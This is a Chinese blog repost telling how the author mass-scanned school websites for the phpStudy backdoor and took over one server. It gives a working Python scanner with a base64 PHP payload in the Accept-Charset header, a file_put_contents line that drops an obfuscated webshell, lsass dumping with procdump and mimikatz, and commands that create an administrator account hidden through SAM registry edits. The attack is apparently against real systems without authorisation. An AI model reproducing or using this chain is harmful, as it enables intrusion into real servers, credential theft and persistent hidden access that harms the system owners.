Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!

admin 2022年5月11日10:48:51安全闲碎评论3 views3333字阅读11分6秒阅读模式

零基础黑客教程,黑客圈新闻,安全面试经验

尽在 # 暗网黑客教程 #




2

综合性解密工具


原笔者在发现phpstudy 被爆出存在后门后,对学校站群进行了脚本式的批量扫描。


而平日里看起来没有太大问题的站点,就因为phpstudy的一次漏洞新闻,被笔者拿来利用开刀了,小编还是想要感叹一下,供应链攻击还是强!


以下是轻轻松松的渗透全过程。



phpstudy 后门扫描脚本



import requestsimport threading
# f = open("ip.txt",'w')def test(ip): url = "http://{}:80/index.php".format(ip) headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Accept-Language": "zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6", "Accept-Charset": "ZWNobyAiZGFvbGd0cyI7", "Accept-Encoding": "gzip,deflate", "Connection": "close"} try: r = requests.get(url, headers=headers) if "daolgts" in r.content: # f.write(ip+"n") print "[+] foundt"+ip # else: # print "[-] nopet"+ip except: pass # print "[-] nopet"+ip
thread=[]for _ in range(1,256): print "[-] ip :"+_+"next..." for i in range(1,256): ip = "192.168."+str(_)+"."+str(i) t=threading.Thread(target=test,args=(ip,)) thread.append(t) t.start()
for x in thread:    t.join()


getshell


根据 payload 可以执行任意的 php 代码

先 getcwd() 看下位置


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!


var_dump(getcwd());
dmFyX2R1bXAoZ2V0Y3dkKCkpOw==
string(12) "C:phpStudy2"


var_dump(scandir("C:phpStudy2"));var_dump(scandir("C:phpStudy2PHPTutorial"));var_dump(scandir("C:phpStudy2PHPTutorialWWW"));


找到网站目录

C:phpStudy2PHPTutorialWWW


file_put_contents 写马


file_put_contents("C:phpStudy2PHPTutorialWWW",base64_decode("PD9waHAgJGRHcWE9Y3JlYXRlX2Z1bmN0aW9uKGNocig0OTUtNDU5KS5iYXNlNjRfZGVjb2RlKCdjdz09JykuY2hyKDA0MTUtMDIzNikuc3RyX3JvdDEzKCd6JykuY2hyKDUyNzIyLzUyMiksc3RyX3JvdDEzKCdyJykuYmFzZTY0X2RlY29kZSgnZGc9PScpLmNocig5OTktOTAyKS5jaHIoMHhjNzIwLzB4MWQ4KS5iYXNlNjRfZGVjb2RlKCdLQT09JykuY2hyKDAxMDMzLTA3NjcpLmJhc2U2NF9kZWNvZGUoJ2N3PT0nKS5jaHIoMHgzMWMtMHgyYWQpLmJhc2U2NF9kZWNvZGUoJ2JRPT0nKS5jaHIoNDUxNDcvNDQ3KS5jaHIoMHg5NjExLzB4M2E5KS5iYXNlNjRfZGVjb2RlKCdPdz09JykpOyRkR3FhKGJhc2U2NF9kZWNvZGUoJ05UTXlNJy4nVE16TzAnLidCbGRrRicuJ3NLQ1JmJy4nJy5jaHIoODI2MjAvOTcyKS5zdHJfcm90MTMoJ1InKS5jaHIoMHhkNi0weDlkKS5zdHJfcm90MTMoJ0cnKS5iYXNlNjRfZGVjb2RlKCdWZz09JykuJycuJycuY2hyKDB4MmE0LTB4MjVlKS5zdHJfcm90MTMoJ2cnKS5iYXNlNjRfZGVjb2RlKCdVUT09JykuY2hyKDA0NTE0MC8wMzQwKS5jaHIoMHg0ZjZmLzB4MTlmKS4nJy4ncERTSEInLidYVUYwcCcuJ096RTFPJy4nVFl6T1QnLidrNycuJycpKTs/Pg=="));

这里使用了蚁剑的插件生成shell,配合蚁剑连接使用


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!


成功连接


继续深入


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!

emmm,直接就是 administrator 了,也没有内网环境,后来发现是一台虚拟机,枯燥。


看下端口


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!

发现开启了 3306 和 98333306 是 mysql ,这个 9833 应该就是修改了的 3389 的端口


mysql 的密码在 config.php 中能找到,而且是 root 用户


使用蚁剑连接,在数据库中发现网站后台的管理员密码


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!


然后目标转向 9983


kali 下使用 rdesktop 有问题


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!


windows 里 mstsc.exe 可以正常连接


然后抓下密码,先传个 procdump64.exe,执行

procdump64.exe -accepteula -ma lsass.exe 1.dmp

得到 1.dmp ,使用 mimikatz.exe 读

sekurlsa::minidump lsass.dmpsekurlsa::logonPasswords full


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!



emmm,不知道为什么抓不到密码,也尝试了传 mimikatz.exe 直接读,同样失败


既然已经拿到了 administrator 权限,直接添加一个后门用户吧


net user defaultuser0$ somepasswordhere /add /ynet localgroup administrators defaultuser0$ /addnet localgroup "remote desktop users" defaultuser0$ /add


使用该账号密码,成功登录


用户名后添加 $ 在 cmd 里使用 net user 查看时是可以隐藏的,但在图形界面下还是会显示


接下来操作注册表,使这个账户在图形界面中也不显示


输入 regedit 打开注册表编辑器,找到 HKEY_LOCAL_MACHINESAMSAM,右键点击权限,将读写权限赋予 administrator


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!


找到后门用户和 administrator 用户对应的目录


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!


将 administrator 对应目录中的F值复制到后门用户对应目录中的F值


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!


复制完成后,把 defaultuser0$ 和其对应的 0000003EA 目录导出并保存

然后删除刚才的后门用户

net user defaultuser0$ /del


然后重新导入注册表,这样就添加了一个隐藏的用户,使用 defaultuser0$ 和密码就能登陆为 administrator


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!



事后


发现登着 tim 呢,找到 qq 号,进行亲切友好的交谈

Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!




黑客教程~ 课件 靶场 ~ 限!时!免费!送!

长按识别二维码,即可限时免费报名课程。


Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!




点击在看~好文大家给一起看!👇



原文始发于微信公众号(白帽子左一):Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦!

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月11日10:48:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Phpstudy后门怎么玩?不跟进漏洞新闻的黑客要被拍死在沙滩上啦! http://cn-sec.com/archives/957398.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: